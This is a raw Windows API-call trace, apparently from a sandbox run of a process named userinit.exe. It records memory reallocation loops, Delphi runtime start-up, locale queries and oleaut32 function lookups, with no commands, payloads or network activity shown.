[0128.422] GlobalReAlloc (hMem=0x35000c, dwBytes=0xc8000, uFlags=0x2) returned 0x35000c
[0128.437] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0128.438] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0128.438] GlobalUnlock (hMem=0x35000c) returned 0
[0128.438] GlobalReAlloc (hMem=0x35000c, dwBytes=0xca000, uFlags=0x2) returned 0x35000c
[0128.502] GlobalLock (hMem=0x35000c) returned 0x26c0020
[0128.503] GlobalHandle (pMem=0x26c0020) returned 0x35000c
[0128.503] GlobalUnlock (hMem=0x35000c) returned 0
[0128.503] GlobalReAlloc (hMem=0x35000c, dwBytes=0xcc000, uFlags=0x2) returned 0x35000c
[0128.520] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0128.521] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0128.521] GlobalUnlock (hMem=0x35000c) returned 0
[0128.521] GlobalReAlloc (hMem=0x35000c, dwBytes=0xce000, uFlags=0x2) returned 0x35000c
[0128.585] GlobalLock (hMem=0x35000c) returned 0x26c0020
[0128.586] GlobalHandle (pMem=0x26c0020) returned 0x35000c
[0128.586] GlobalUnlock (hMem=0x35000c) returned 0
[0128.586] GlobalReAlloc (hMem=0x35000c, dwBytes=0xd0000, uFlags=0x2) returned 0x35000c
[0128.603] GlobalLock (hMem=0x35000c) returned 0x2790020
[0128.604] GlobalHandle (pMem=0x2790020) returned 0x35000c
[0128.604] GlobalUnlock (hMem=0x35000c) returned 0
[0128.604] GlobalReAlloc (hMem=0x35000c, dwBytes=0xd2000, uFlags=0x2) returned 0x35000c
[0128.621] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0128.622] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0128.622] GlobalUnlock (hMem=0x35000c) returned 0
[0128.622] GlobalReAlloc (hMem=0x35000c, dwBytes=0xd4000, uFlags=0x2) returned 0x35000c
[0128.686] GlobalLock (hMem=0x35000c) returned 0x26d0020
[0128.687] GlobalHandle (pMem=0x26d0020) returned 0x35000c
[0128.687] GlobalUnlock (hMem=0x35000c) returned 0
[0128.687] GlobalReAlloc (hMem=0x35000c, dwBytes=0xd6000, uFlags=0x2) returned 0x35000c
[0128.705] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0128.706] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0128.706] GlobalUnlock (hMem=0x35000c) returned 0
[0128.706] GlobalReAlloc (hMem=0x35000c, dwBytes=0xd8000, uFlags=0x2) returned 0x35000c
[0128.723] GlobalLock (hMem=0x35000c) returned 0x26d0020
[0128.724] GlobalHandle (pMem=0x26d0020) returned 0x35000c
[0128.724] GlobalUnlock (hMem=0x35000c) returned 0
[0128.724] GlobalReAlloc (hMem=0x35000c, dwBytes=0xda000, uFlags=0x2) returned 0x35000c
[0128.789] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0128.790] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0128.790] GlobalUnlock (hMem=0x35000c) returned 0
[0128.790] GlobalReAlloc (hMem=0x35000c, dwBytes=0xdc000, uFlags=0x2) returned 0x35000c
[0128.808] GlobalLock (hMem=0x35000c) returned 0x26d0020
[0128.809] GlobalHandle (pMem=0x26d0020) returned 0x35000c
[0128.809] GlobalUnlock (hMem=0x35000c) returned 0
[0128.809] GlobalReAlloc (hMem=0x35000c, dwBytes=0xde000, uFlags=0x2) returned 0x35000c
[0128.898] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0128.899] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0128.899] GlobalUnlock (hMem=0x35000c) returned 0
[0128.899] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe0000, uFlags=0x2) returned 0x35000c
[0128.917] GlobalLock (hMem=0x35000c) returned 0x26d0020
[0128.918] GlobalHandle (pMem=0x26d0020) returned 0x35000c
[0128.918] GlobalUnlock (hMem=0x35000c) returned 0
[0128.918] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe2000, uFlags=0x2) returned 0x35000c
[0128.984] GlobalLock (hMem=0x35000c) returned 0x27c0020
[0128.986] GlobalHandle (pMem=0x27c0020) returned 0x35000c
[0128.986] GlobalUnlock (hMem=0x35000c) returned 0
[0128.986] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe4000, uFlags=0x2) returned 0x35000c
[0129.015] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0129.016] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0129.016] GlobalUnlock (hMem=0x35000c) returned 0
[0129.016] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe6000, uFlags=0x2) returned 0x35000c
[0129.081] GlobalLock (hMem=0x35000c) returned 0x26e0020
[0129.082] GlobalHandle (pMem=0x26e0020) returned 0x35000c
[0129.082] GlobalUnlock (hMem=0x35000c) returned 0
[0129.082] GlobalReAlloc (hMem=0x35000c, dwBytes=0xe8000, uFlags=0x2) returned 0x35000c
[0129.101] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0129.102] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0129.102] GlobalUnlock (hMem=0x35000c) returned 0
[0129.102] GlobalReAlloc (hMem=0x35000c, dwBytes=0xea000, uFlags=0x2) returned 0x35000c
[0129.168] GlobalLock (hMem=0x35000c) returned 0x26e0020
[0129.169] GlobalHandle (pMem=0x26e0020) returned 0x35000c
[0129.169] GlobalUnlock (hMem=0x35000c) returned 0
[0129.169] GlobalReAlloc (hMem=0x35000c, dwBytes=0xec000, uFlags=0x2) returned 0x35000c
[0129.192] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0129.192] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0129.192] GlobalUnlock (hMem=0x35000c) returned 0
[0129.192] GlobalReAlloc (hMem=0x35000c, dwBytes=0xee000, uFlags=0x2) returned 0x35000c
[0129.259] GlobalLock (hMem=0x35000c) returned 0x26e0020
[0129.260] GlobalHandle (pMem=0x26e0020) returned 0x35000c
[0129.260] GlobalUnlock (hMem=0x35000c) returned 0
[0129.260] GlobalReAlloc (hMem=0x35000c, dwBytes=0xf0000, uFlags=0x2) returned 0x35000c
[0129.280] GlobalLock (hMem=0x35000c) returned 0x27d0020
[0129.281] GlobalHandle (pMem=0x27d0020) returned 0x35000c
[0129.281] GlobalUnlock (hMem=0x35000c) returned 0
[0129.281] GlobalReAlloc (hMem=0x35000c, dwBytes=0xf2000, uFlags=0x2) returned 0x35000c
[0129.350] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0129.351] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0129.351] GlobalUnlock (hMem=0x35000c) returned 0
[0129.351] GlobalReAlloc (hMem=0x35000c, dwBytes=0xf4000, uFlags=0x2) returned 0x35000c
[0129.373] GlobalLock (hMem=0x35000c) returned 0x26f0020
[0129.374] GlobalHandle (pMem=0x26f0020) returned 0x35000c
[0129.374] GlobalUnlock (hMem=0x35000c) returned 0
[0129.374] GlobalReAlloc (hMem=0x35000c, dwBytes=0xf6000, uFlags=0x2) returned 0x35000c
[0129.445] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0129.446] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0129.446] GlobalUnlock (hMem=0x35000c) returned 0
[0129.446] GlobalReAlloc (hMem=0x35000c, dwBytes=0xf8000, uFlags=0x2) returned 0x35000c
[0129.466] GlobalLock (hMem=0x35000c) returned 0x26f0020
[0129.466] GlobalHandle (pMem=0x26f0020) returned 0x35000c
[0129.466] GlobalUnlock (hMem=0x35000c) returned 0
[0129.466] GlobalReAlloc (hMem=0x35000c, dwBytes=0xfa000, uFlags=0x2) returned 0x35000c
[0129.488] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0129.536] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0129.536] GlobalUnlock (hMem=0x35000c) returned 0
[0129.536] GlobalReAlloc (hMem=0x35000c, dwBytes=0xfc000, uFlags=0x2) returned 0x35000c
[0129.556] GlobalLock (hMem=0x35000c) returned 0x26f0020
[0129.557] GlobalHandle (pMem=0x26f0020) returned 0x35000c
[0129.557] GlobalUnlock (hMem=0x35000c) returned 0
[0129.557] GlobalReAlloc (hMem=0x35000c, dwBytes=0xfe000, uFlags=0x2) returned 0x35000c
[0129.580] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0129.581] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0129.581] GlobalUnlock (hMem=0x35000c) returned 0
[0129.581] GlobalReAlloc (hMem=0x35000c, dwBytes=0x100000, uFlags=0x2) returned 0x35000c
[0129.652] GlobalLock (hMem=0x35000c) returned 0x26f0020
[0129.653] GlobalHandle (pMem=0x26f0020) returned 0x35000c
[0129.653] GlobalUnlock (hMem=0x35000c) returned 0
[0129.653] GlobalReAlloc (hMem=0x35000c, dwBytes=0x102000, uFlags=0x2) returned 0x35000c
[0129.729] GlobalLock (hMem=0x35000c) returned 0x2800020
[0129.730] GlobalHandle (pMem=0x2800020) returned 0x35000c
[0129.730] GlobalUnlock (hMem=0x35000c) returned 0
[0129.731] GlobalReAlloc (hMem=0x35000c, dwBytes=0x104000, uFlags=0x2) returned 0x35000c
[0129.756] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0129.757] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0129.757] GlobalUnlock (hMem=0x35000c) returned 0
[0129.757] GlobalReAlloc (hMem=0x35000c, dwBytes=0x106000, uFlags=0x2) returned 0x35000c
[0129.827] GlobalLock (hMem=0x35000c) returned 0x2700020
[0129.828] GlobalHandle (pMem=0x2700020) returned 0x35000c
[0129.828] GlobalUnlock (hMem=0x35000c) returned 0
[0129.828] GlobalReAlloc (hMem=0x35000c, dwBytes=0x108000, uFlags=0x2) returned 0x35000c
[0129.849] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0129.850] GlobalHandle (pMem=0x25f0020) returned 0x35000c
[0129.850] GlobalUnlock (hMem=0x35000c) returned 0
[0129.850] GlobalReAlloc (hMem=0x35000c, dwBytes=0x10a000, uFlags=0x2) returned 0x35000c
[0129.918] GlobalLock (hMem=0x35000c) returned 0x2700020
[0129.919] GlobalHandle (pMem=0x2700020) returned 0x35000c
[0129.919] GlobalUnlock (hMem=0x35000c) returned 0
[0129.919] GlobalReAlloc (hMem=0x35000c, dwBytes=0x10c000, uFlags=0x2) returned 0x35000c
[0129.941] GlobalLock (hMem=0x35000c) returned 0x25f0020
[0129.941] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2700000
[0129.942] VirtualAlloc (lpAddress=0x2700000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2700000
[0130.027] GetKeyboardType (nTypeFlag=0) returned 4
[0130.027] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0130.027] GetStartupInfoA (in: lpStartupInfo=0x6f880 | out: lpStartupInfo=0x6f880*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0130.027] GetVersion () returned 0x1db10106
[0130.027] GetVersion () returned 0x1db10106
[0130.027] GetCurrentThreadId () returned 0x860
[0130.027] GetModuleFileNameA (in: hModule=0x2810000, lpFilename=0x6f37c, nSize=0x105 | out: lpFilename="\x8c\xf3\x06" (normalized: "c:\\windows\\system32\\\x8có\x06")) returned 0x0
[0130.027] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6f257, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.027] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f36c | out: phkResult=0x6f36c*=0x0) returned 0x2
[0130.027] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f36c | out: phkResult=0x6f36c*=0x0) returned 0x2
[0130.027] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x6f36c | out: phkResult=0x6f36c*=0x0) returned 0x2
[0130.027] lstrcpynA (in: lpString1=0x6f257, lpString2="\x8c\xf3\x06", iMaxLength=261 | out: lpString1="\x8c\xf3\x06") returned="\x8c\xf3\x06"
[0130.028] GetThreadLocale () returned 0x409
[0130.028] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x6f367, cchData=5 | out: lpLCData="ENU") returned 4
[0130.028] lstrlenA (lpString="\x8c\xf3\x06") returned 3
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffc4, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0130.028] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x26dcc0
[0130.028] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2930000
[0130.028] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x26ecc0
[0130.028] VirtualAlloc (lpAddress=0x2930000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2930000
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffc3, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffc1, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffc2, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffd4, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffdd, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffd3, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffd0, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffd7, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffd6, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffe8, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffe9, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffea, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffe7, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffe5, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0130.028] LoadStringA (in: hInstance=0x2810000, uID=0xffe3, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xffe2, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xffe1, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xffe0, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xffff, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xfffe, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xfffd, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xfffc, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xfffb, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xfffa, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xfff9, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xfff8, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xfff7, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xfff6, lpBuffer=0x6f4a0, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xfff4, lpBuffer=0x6f48c, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0130.029] LoadStringA (in: hInstance=0x2810000, uID=0xffe4, lpBuffer=0x6f48c, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0130.029] GetVersionExA (in: lpVersionInformation=0x6f824*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2810000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x81\x02·\"\x81\x02¼ø\x06") | out: lpVersionInformation=0x6f824*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0130.029] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.029] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0130.029] GetThreadLocale () returned 0x409
[0130.029] GetThreadLocale () returned 0x409
[0130.029] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Jan") returned 4
[0130.029] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="January") returned 8
[0130.029] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Feb") returned 4
[0130.029] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="February") returned 9
[0130.029] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Mar") returned 4
[0130.029] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="March") returned 6
[0130.029] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Apr") returned 4
[0130.029] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="April") returned 6
[0130.029] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="May") returned 4
[0130.029] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="May") returned 4
[0130.029] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Jun") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="June") returned 5
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Jul") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="July") returned 5
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Aug") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="August") returned 7
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Sep") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="September") returned 10
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Oct") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="October") returned 8
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Nov") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="November") returned 9
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Dec") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="December") returned 9
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Sun") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Sunday") returned 7
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Mon") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Monday") returned 7
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Tue") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Tuesday") returned 8
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Wed") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Wednesday") returned 10
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Thu") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Thursday") returned 9
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Fri") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Friday") returned 7
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Sat") returned 4
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x6f6fc, cchData=256 | out: lpLCData="Saturday") returned 9
[0130.030] GetThreadLocale () returned 0x409
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x6f758, cchData=256 | out: lpLCData="$") returned 2
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x6f758, cchData=256 | out: lpLCData="0") returned 2
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x6f758, cchData=256 | out: lpLCData="0") returned 2
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x6f850, cchData=2 | out: lpLCData=",") returned 2
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x6f850, cchData=2 | out: lpLCData=".") returned 2
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x6f758, cchData=256 | out: lpLCData="2") returned 2
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x6f850, cchData=2 | out: lpLCData="/") returned 2
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x6f758, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0130.030] GetThreadLocale () returned 0x409
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6f724, cchData=256 | out: lpLCData="1") returned 2
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x6f758, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0130.030] GetThreadLocale () returned 0x409
[0130.030] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6f724, cchData=256 | out: lpLCData="1") returned 2
[0130.031] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x6f850, cchData=2 | out: lpLCData=":") returned 2
[0130.031] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x6f758, cchData=256 | out: lpLCData="AM") returned 3
[0130.031] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x6f758, cchData=256 | out: lpLCData="PM") returned 3
[0130.031] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x6f758, cchData=256 | out: lpLCData="0") returned 2
[0130.031] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x6f758, cchData=256 | out: lpLCData="0") returned 2
[0130.031] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x6f758, cchData=256 | out: lpLCData="0") returned 2
[0130.031] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x6f850, cchData=2 | out: lpLCData=",") returned 2
[0130.031] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0130.031] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0130.031] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0130.031] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0130.031] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0130.031] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0130.031] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0130.031] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0130.031] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0130.031] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0130.031] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0130.032] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
